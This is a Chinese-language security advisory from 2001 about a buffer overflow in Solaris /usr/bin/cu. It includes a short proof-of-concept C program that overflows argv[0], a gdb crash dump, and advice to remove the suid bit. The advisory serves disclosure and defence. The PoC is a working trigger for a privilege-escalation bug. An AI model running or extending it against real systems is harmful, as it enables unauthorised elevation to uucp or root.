发布日期：2001-01-27
更新日期：2001-01-27

受影响系统：

Sun Solaris 8.0
Sun Solaris 7.0
Sun Solaris 2.6
Sun Solaris 2.5.1
Sun Solaris 2.5
Sun Solaris 2.4

描述：

---

BUGTRAQ ID ：2253

cu是一个unix通讯工具。它通常安装时被设置了较高的权限以便它可以访问通
讯硬件。

Solaris所带的/usr/bin/cu存在一个缓冲区溢出漏洞。cu在执行时会将argv[0]
拷贝到一个内部缓冲区中而没有进行边界检查。因此，如果argv[0]超过了目标
缓冲区的长度，它就可以覆盖堆栈中的临近数据。

本地攻击者利用此漏洞可能获取euid 'uucp'的权限。这也可能导致攻击者获取
root权限。

<*来源: Pablo Sor (psor@afip.gov.ar) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

下面是Pablo Sor提供的测试代码以及步骤：

#include <stdio.h>

void main(int argc,char **argv)
{
char *buf;

buf = (char *) malloc(atoi(argv[1])*sizeof(char));
memset(buf,0x41,atoi(argv[1])-1);
buf[atoi(argv[1])-1]=0;
execl("/usr/bin/cu",buf,(char *)0);
}

$ uname -a
SunOS tomy 5.5.1 Generic_103640-34 sun4m sparc SUNW,SPARCstation-5

$ ./cu-demo 4000
Segmentation Fault (core dumped)

$ gdb ./cu-demo --core=core

GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "sparc-sun-solaris2.5.1"...
warning: core file may not match specified executable file.
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation Fault.
#0  0xef62901c in ?? ()
(gdb) info registers
g0             0x0      0
g1             0xef628d24       -278754012
g2             0x0      0
g3             0x0      0
g4             0x0      0
g5             0x0      0
g6             0x0      0
g7             0x0      0
o0             0x137a4  79780
o1             0xef792a88       -277271928
o2             0x0      0
o3             0x0      0
o4             0x0      0
o5             0xef792a88       -277271928
sp             0xefffecb0       -268440400
o7             0x31b48  203592
l0             0x7efefeff       2130640639
l1             0x81010100       -2130640640
l2             0xff000000       -16777216
l3             0xff0000 16711680
l4             0xff00   65280
l5             0x81010100       -2130640640
l6             0x7      7
l7             0xef7927d4       -277272620
i0             0x39000  233472
i1             0xeffffec4       -268435772
i2             0x38088  229512
i3             0x41414141       1094795585
i4             0x2f     47
i5             0x0      0
fp             0xefffecf0       -268440336
i7             0x137a4  79780
y              0x0      0
psr            0x4400086        71303302
wim            0x0      0
tbr            0x0      0
pc             0xef62901c       -278753252
npc            0xef628ffc       -278753284
fpsr           0x0      0
cpsr           0x0      0

建议：

---

临时解决办法：

NSFOCUS建议您立即去掉/usr/bin/cu的suid属性。

厂商补丁：

暂无。

浏览次数：3990
严重程度：0（网友投票）